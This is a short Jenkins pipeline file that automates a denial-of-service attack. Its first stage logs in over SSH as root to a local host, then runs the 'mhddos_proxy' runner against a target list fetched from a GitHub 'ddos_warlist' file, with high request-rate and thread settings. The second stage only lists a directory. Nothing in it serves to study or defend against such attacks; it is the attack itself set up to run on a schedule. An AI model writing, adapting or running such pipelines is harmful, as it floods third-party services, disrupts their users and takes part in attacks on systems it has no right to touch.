#!groovy
// Check ub1 properties
properties([disableConcurrentBuilds()])

pipeline {
    agent { 
        label 'master'
        }
    options {
        buildDiscarder(logRotator(numToKeepStr: '10', artifactNumToKeepStr: '10'))
        timestamps()
    }
    stages {
        stage("First step") {
            steps {
                sh 'ssh root@192.168.0.100 ls && \'. ~/venv/bin/activate\' && \'python3.9 /root/mhddos_proxy/runner.py -c https://raw.githubusercontent.com/gidiyan/ddos_warlist/main/l4_tcp_all.lst --rpc 1000 --vpn  -t 130\''
            }
        }
        stage("Second step") {
            steps {
                sh 'ls -la'
            }
        }
    }
}
